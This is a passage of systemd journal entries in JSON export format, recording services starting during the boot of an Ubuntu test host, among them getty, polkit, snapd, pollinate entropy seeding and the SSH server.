"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "plymouth-quit.service", "INVOCATION_ID" : "c345885054b24af6bf1126493e521c75", "MESSAGE" : "Started Terminate Plymouth Boot Screen.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818453725" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32a;b=e2b08827b5804427b422c10c84f1567e;m=2a63dbe;t=5bd16df69bd25;x=42e6870cfd4a68a1", "__REALTIME_TIMESTAMP" : "1615280818732325", "__MONOTONIC_TIMESTAMP" : "44449214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "setvtrgb.service", "INVOCATION_ID" : "f1b78fb9a2b84e2fa897cc4f1b9c2dbc", "MESSAGE" : "Started Set console scheme.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818468121" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32b;b=e2b08827b5804427b422c10c84f1567e;m=2a63e19;t=5bd16df69bd80;x=7c36cebfe0645687", "__REALTIME_TIMESTAMP" : "1615280818732416", "__MONOTONIC_TIMESTAMP" : "44449305", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Created slice system-getty.slice.", "UNIT" : "system-getty.slice", "INVOCATION_ID" : "125f02b327ec465b96e4c10b0e9ba337", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818470911" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32c;b=e2b08827b5804427b422c10c84f1567e;m=2a63e65;t=5bd16df69bdcd;x=aef5fe72952f47d", "__REALTIME_TIMESTAMP" : "1615280818732493", "__MONOTONIC_TIMESTAMP" : "44449381", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Getty on tty1.", "UNIT" : "getty@tty1.service", "INVOCATION_ID" : "8b46541929ef4e8aadfe0703f2a81028", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818480081" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32d;b=e2b08827b5804427b422c10c84f1567e;m=2a63ebb;t=5bd16df69be22;x=6b1b08f772d95efd", "__REALTIME_TIMESTAMP" : "1615280818732578", "__MONOTONIC_TIMESTAMP" : "44449467", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Login Prompts.", "UNIT" : "getty.target", "INVOCATION_ID" : "e1ddb495fc2f4c12b84162798cccd2bb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818484008" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32e;b=e2b08827b5804427b422c10c84f1567e;m=2a644a6;t=5bd16df69c40e;x=8ac4ec612bb0b149", "__REALTIME_TIMESTAMP" : "1615280818734094", "__MONOTONIC_TIMESTAMP" : "44450982", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "grub-common.service", "INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a", "MESSAGE" : "Started LSB: Record successful boot for GRUB.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818497851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32f;b=e2b08827b5804427b422c10c84f1567e;m=2a64531;t=5bd16df69c498;x=537110d2c3197afd", "__REALTIME_TIMESTAMP" : "1615280818734232", "__MONOTONIC_TIMESTAMP" : "44451121", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "apport.service", "INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26", "MESSAGE" : "Started LSB: automatic crash report generation.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818508165" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=330;b=e2b08827b5804427b422c10c84f1567e;m=2a64594;t=5bd16df69c4fb;x=c27d5488bc1c525f", "__REALTIME_TIMESTAMP" : "1615280818734331", "__MONOTONIC_TIMESTAMP" : "44451220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "polkit.service", "INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "MESSAGE" : "Started Authorization Manager.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552924" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=331;b=e2b08827b5804427b422c10c84f1567e;m=2a645de;t=5bd16df69c545;x=e5031d2cf2fb0f22", "__REALTIME_TIMESTAMP" : "1615280818734405", "__MONOTONIC_TIMESTAMP" : "44451294", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "accounts-daemon.service", "INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "MESSAGE" : "Started Accounts Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818557033" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=332;b=e2b08827b5804427b422c10c84f1567e;m=2a64624;t=5bd16df69c58c;x=10c48f30b9fda882", "__REALTIME_TIMESTAMP" : "1615280818734476", "__MONOTONIC_TIMESTAMP" : "44451364", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-hostnamed.service", "INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "MESSAGE" : "Started Hostname Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818634669" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=333;b=e2b08827b5804427b422c10c84f1567e;m=2a64671;t=5bd16df69c5d9;x=8b8d263511ef7d30", "__REALTIME_TIMESTAMP" : "1615280818734553", "__MONOTONIC_TIMESTAMP" : "44451441", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/hostname/hostnamed.c", "CODE_LINE" : "483", "CODE_FUNC" : "method_set_hostname", "SYSLOG_IDENTIFIER" : "systemd-hostnamed", "MESSAGE" : "Changed host name to 'host-192-168-10-95'", "_PID" : "827", "_COMM" : "systemd-hostnam", "_EXE" : "/lib/systemd/systemd-hostnamed", "_CMDLINE" : "/lib/systemd/systemd-hostnamed", "_CAP_EFFECTIVE" : "200000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-hostnamed.service", "_SYSTEMD_UNIT" : "systemd-hostnamed.service", "_SYSTEMD_INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818700892" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=334;b=e2b08827b5804427b422c10c84f1567e;m=2a95fca;t=5bd16df6cdf31;x=82aea42c373bff27", "__REALTIME_TIMESTAMP" : "1615280818937649", "__MONOTONIC_TIMESTAMP" : "44654538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "98b8e18cae2b44329dd2b99cfc8ca266", "SYSLOG_IDENTIFIER" : "networkd-dispatcher", "MESSAGE" : "No valid path found for iwconfig", "_PID" : "778", "_COMM" : "networkd-dispat", "_CMDLINE" : "/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers", "_SYSTEMD_CGROUP" : "/system.slice/networkd-dispatcher.service", "_SYSTEMD_UNIT" : "networkd-dispatcher.service", "_SYSTEMD_INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=335;b=e2b08827b5804427b422c10c84f1567e;m=2a9702b;t=5bd16df6cef93;x=613965ac6fdc269a", "__REALTIME_TIMESTAMP" : "1615280818941843", "__MONOTONIC_TIMESTAMP" : "44658731", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "98b8e18cae2b44329dd2b99cfc8ca266", "SYSLOG_IDENTIFIER" : "networkd-dispatcher", "_PID" : "778", "_COMM" : "networkd-dispat", "_CMDLINE" : "/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers", "_SYSTEMD_CGROUP" : "/system.slice/networkd-dispatcher.service", "_SYSTEMD_UNIT" : "networkd-dispatcher.service", "_SYSTEMD_INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "MESSAGE" : "No valid path found for iw" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=336;b=e2b08827b5804427b422c10c84f1567e;m=2aa0b15;t=5bd16df6d8a7d;x=a341e91927040427", "__REALTIME_TIMESTAMP" : "1615280818981501", "__MONOTONIC_TIMESTAMP" : "44698389", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "networkd-dispatcher.service", "INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "MESSAGE" : "Started Dispatcher daemon for systemd-networkd.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818978129" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=337;b=e2b08827b5804427b422c10c84f1567e;m=2aac31b;t=5bd16df6e4282;x=2b8e71bb2b69ee26", "__REALTIME_TIMESTAMP" : "1615280819028610", "__MONOTONIC_TIMESTAMP" : "44745499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "MESSAGE" : "AppArmor status: apparmor is enabled and all features are available", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=338;b=e2b08827b5804427b422c10c84f1567e;m=2ae32b7;t=5bd16df71b21f;x=cf28ad7faf15f310", "__REALTIME_TIMESTAMP" : "1615280819253791", "__MONOTONIC_TIMESTAMP" : "44970679", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "MESSAGE" : "client verified challenge/response with [https://entropy.ubuntu.com/]", "_PID" : "901", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_CMDLINE" : "logger --id=787 -t pollinate client verified challenge/response with [https://entropy.ubuntu.com/]", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819253685" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=339;b=e2b08827b5804427b422c10c84f1567e;m=2ae7e71;t=5bd16df71fdd8;x=e62c3f540e40b1a0", "__REALTIME_TIMESTAMP" : "1615280819273176", "__MONOTONIC_TIMESTAMP" : "44990065", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "client hashed response from [https://entropy.ubuntu.com/]", "_PID" : "909", "_CMDLINE" : "logger --id=787 -t pollinate client hashed response from [https://entropy.ubuntu.com/]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819273149" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33a;b=e2b08827b5804427b422c10c84f1567e;m=2ae93e9;t=5bd16df721350;x=37ab24b8f1ef2da3", "__REALTIME_TIMESTAMP" : "1615280819278672", "__MONOTONIC_TIMESTAMP" : "44995561", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "lxd-containers.service", "INVOCATION_ID" : "69bb4a33e4a84106a814b4eb83881d94", "MESSAGE" : "Started LXD - container startup/shutdown.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819276209" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33b;b=e2b08827b5804427b422c10c84f1567e;m=2ae9eec;t=5bd16df721e53;x=c7bc168b61122055", "__REALTIME_TIMESTAMP" : "1615280819281491", "__MONOTONIC_TIMESTAMP" : "44998380", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "client successfully seeded [/dev/urandom]", "_PID" : "910", "_CMDLINE" : "logger --id=787 -t pollinate client successfully seeded [/dev/urandom]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819281481" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33c;b=e2b08827b5804427b422c10c84f1567e;m=2aeaaea;t=5bd16df722a51;x=69130601c522a0a9", "__REALTIME_TIMESTAMP" : "1615280819284561", "__MONOTONIC_TIMESTAMP" : "45001450", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "helpers.go:145: error trying to compare the snap system key: system-key missing on disk" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33d;b=e2b08827b5804427b422c10c84f1567e;m=2aec53e;t=5bd16df7244a6;x=cc7837c983afc749", "__REALTIME_TIMESTAMP" : "1615280819291302", "__MONOTONIC_TIMESTAMP" : "45008190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "pollinate.service", "INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "Started Pollinate to seed the pseudo random number generator.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819287852" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33e;b=e2b08827b5804427b422c10c84f1567e;m=2aef68d;t=5bd16df7275f4;x=2f8d56aa93754fe9", "__REALTIME_TIMESTAMP" : "1615280819303924", "__MONOTONIC_TIMESTAMP" : "45020813", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting OpenBSD Secure Shell server...", "UNIT" : "ssh.service", "INVOCATION_ID" : 